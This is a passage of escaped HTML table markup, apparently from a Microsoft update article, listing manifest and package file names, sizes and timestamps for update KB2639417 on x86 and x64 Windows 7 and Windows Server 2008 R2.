class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,929</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Update-bf.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File 
size</span></td><td class=\"sbody-td\">2,728</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_2741763af4537d13d2c9e548ebb3c51c_31bf3856ad364e35_6.1.7601.17730_none_77cdf54610460b0e.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">694</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_3bdc3aa11f4024df1b03f773970380d2_31bf3856ad364e35_6.1.7600.21097_none_ec41703668627eb3.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">694</td></tr><tr 
class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_54f9830b5dfbe584cc365eb4e0d72ca4_31bf3856ad364e35_6.1.7601.21866_none_b0c4109ef6f3b462.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">694</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_e6bb1c633a80397320d17e389bc8fdb7_31bf3856ad364e35_6.1.7600.16920_none_0aaea0d21153d97c.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">694</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date 
(UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft-windows-win32k_31bf3856ad364e35_6.1.7600.16920_none_b905b957fbae27c2.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">42,086</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">07:21</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft-windows-win32k_31bf3856ad364e35_6.1.7600.21097_none_b94a7ef114fe729f.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">42,086</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr 
class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">07:23</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft-windows-win32k_31bf3856ad364e35_6.1.7601.17730_none_bae14671f8dcaf9f.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">42,086</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">07:14</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft-windows-win32k_31bf3856ad364e35_6.1.7601.21866_none_bb507535120d3b46.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">42,086</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time 
(UTC)</span></td><td class=\"sbody-td\">07:13</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr></table></div><h4 class=\"sbody-h4\">Additional files for all supported x64-based versions of Windows 7 and Windows Server 2008 R2</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_74d86c10d10452a3743ae43b09539d17_31bf3856ad364e35_6.1.7600.16920_none_5722a410ab724a41.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,038</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_7b0773d126abef96929484e26a67350e_31bf3856ad364e35_6.1.7601.17730_none_9975b29df28fed78.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">698</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date 
(UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_7ddad16685d87477adb86abfb9208c3e_31bf3856ad364e35_6.1.7601.17730_none_ea0b830299b03835.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,038</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_8a3e064e710917bb05d489fbf816c5db_31bf3856ad364e35_6.1.7601.17730_none_cbcb63c5a1fd7ee8.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">698</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr 
class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_926678f7016626e47a8bb536262a41bc_31bf3856ad364e35_6.1.7600.21097_none_ac0fbd6391a8e4e0.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">698</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_a0b06e36fc0e3802968c276ba76e3556_31bf3856ad364e35_6.1.7600.21097_none_09dc743827434fc9.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,038</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span 
class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_a0bc39a3cead58baeb5eb09378ae3475_31bf3856ad364e35_6.1.7601.21866_none_e370dec30cc6e1a9.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">698</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_a2276a31acdc22b2fbabab381e073106_31bf3856ad364e35_6.1.7601.21866_none_57a71ae99b0f403b.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,038</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td 
class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_a41541c05e59aeaec493256ee31c5a4d_31bf3856ad364e35_6.1.7600.21097_none_ef8e59c56928601a.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">698</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_b40bfc5a0b0f46bd8bf4963d9c741346_31bf3856ad364e35_6.1.7601.21866_none_71834d3285aed8db.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">698</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td 
class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_b9d5caaa55e6b05a18b838c84ee0555b_31bf3856ad364e35_6.1.7600.16920_none_3cb0c7d4805673e8.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">698</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_db68874f6aeb920a7f4b4137f287d04f_31bf3856ad364e35_6.1.7600.16920_none_418f3c763577979d.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">698</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td 
class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_microsoft-windows-win32k_31bf3856ad364e35_6.1.7600.16920_none_152454dbb40b98f8.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">42,090</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">08:13</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_microsoft-windows-win32k_31bf3856ad364e35_6.1.7600.21097_none_15691a74cd5be3d5.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">42,090</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">08:08</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td 
class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_microsoft-windows-win32k_31bf3856ad364e35_6.1.7601.17730_none_16ffe1f5b13a20d5.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">42,090</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">08:09</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_microsoft-windows-win32k_31bf3856ad364e35_6.1.7601.21866_none_176f10b8ca6aac7c.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">42,090</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">08:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span 
class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_1_for_kb2639417_bf~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,794</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_1_for_kb2639417~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,499</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_2_for_kb2639417_bf~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr 
class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,213</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_2_for_kb2639417~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,707</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span 